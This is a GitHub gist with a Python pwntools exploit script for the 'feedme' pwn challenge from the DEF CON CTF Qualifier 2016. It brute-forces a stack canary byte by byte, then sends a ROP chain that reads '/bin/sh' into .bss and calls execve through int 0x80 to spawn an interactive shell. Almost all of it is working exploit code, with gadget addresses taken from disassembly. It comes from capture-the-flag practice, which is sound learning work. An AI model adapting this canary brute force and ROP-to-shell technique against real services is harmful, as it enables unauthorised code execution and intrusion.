Created
March 11, 2017 00:35
-
-
Save Tosainu/b96fecd08380864109064e1528bc5acc to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # DEF CON CTF Qualifier 2016 : feedme | |
| # https://github.com/ctfs/write-ups-2016/tree/master/def-con-ctf-qualifiers-2016/pwn/feedme | |
| from pwn import * | |
| # [0x08049036]> pdf | |
| # / (fcn) fcn.08049036 122 | |
| # | fcn.08049036 (); | |
| # | ; var int ate_size @ ebp-0x2d | |
| # | ; var int buffer @ ebp-0x2c | |
| # | ; var int canary @ ebp-0xc | |
| # | ; var int local_4h @ esp+0x4 | |
| # | ; var int local_8h @ esp+0x8 | |
| buffer_size = 0x20 | |
| # 0x08048e48 c74424080100. mov dword [esp + 8], 1 | |
| # 0x08048e50 8d45f3 lea eax, dword [ebp - local_dh] | |
| # 0x08048e53 89442404 mov dword [esp + 4], eax | |
| # 0x08048e57 c70424000000. mov dword [esp], 0 | |
| # 0x08048e5e e80d4a0200 call fcn.0806d870 | |
| addr_read = 0x806d870 | |
| # [0x08048e7e]> iS~.bss | |
| # idx=16 vaddr=0x080e9f50 paddr=0x000a0f50 sz=24 vsz=24 perm=--rw- name=.tbss | |
| # idx=24 vaddr=0x080eaf80 paddr=0x000a1f80 sz=6156 vsz=6156 perm=--rw- name=.bss | |
| addr_bss = 0x080eaf80 | |
| addr_ret = 0x080481b2 # 0x080481b2: ret ; (3708 found) | |
| addr_int_0x80 = 0x0806fa20 # 0x0806fa20: int 0x80 ; ret ; (1 found) | |
| addr_pop_eax_ret = 0x080bb496 # 0x080bb496: pop eax ; ret ; (4 found) | |
| addr_pop_edx_ecx_ebx_ret = 0x0806f370 # 0x0806f370: pop edx ; pop ecx ; pop ebx ; ret ; (1 found) | |
| r = remote('localhost', 4000) | |
| # r = process('./feedme') | |
| # r = process('./feedme-patched') | |
| log.info('finding canary...') | |
| canary = 0x00000000 | |
| for i in range(1, 4): | |
| while True: | |
| r.recvuntil('FEED ME!\n') | |
| canary += (0x01 << (i * 8)) | |
| log.debug('trying canary: 0x{:08x}'.format(canary)) | |
| payload = '' | |
| payload += 'A' * buffer_size | |
| payload += p32(canary)[:i + 1] | |
| r.send(chr(len(payload))) | |
| r.send(payload) | |
| if 'YUM,' in r.recvuntil('Child exit.\n'): | |
| break | |
| log.success('canary found!: 0x{:08x}'.format(canary)) | |
| r.recvuntil('FEED ME!\n') | |
| payload = '' | |
| payload += 'A' * buffer_size | |
| payload += p32(canary) | |
| payload += p32(addr_ret) * 10 | |
| # read(0, addr_bss, 0x400) | |
| payload += p32(addr_read) | |
| payload += p32(addr_pop_edx_ecx_ebx_ret) | |
| payload += p32(0) | |
| payload += p32(addr_bss) | |
| payload += p32(0x400) | |
| # eax = 0x0b, ebx = addr_bss, ecx = addr_bss + 0x8, edx = 0x0, int 0x80 | |
| payload += p32(addr_pop_edx_ecx_ebx_ret) | |
| payload += p32(0) | |
| payload += p32(addr_bss + 0x8) | |
| payload += p32(addr_bss) | |
| payload += p32(addr_pop_eax_ret) | |
| payload += p32(0xb) | |
| payload += p32(addr_int_0x80) | |
| log.info('sending ROP (0x{:x} bytes)'.format(len(payload))) | |
| r.send(chr(len(payload))) | |
| r.send(payload) | |
| r.clean() | |
| log.info('sending \'/bin/sh\', [\'/bin/sh\', NULL]') | |
| payload = '' | |
| payload += '/bin/sh'.ljust(0x8, '\x00') # addr_bss | |
| payload += p32(addr_bss) # addr_bss + 0x8 | |
| payload += p32(0) # addr_bss + 0xc | |
| r.sendline(payload) | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment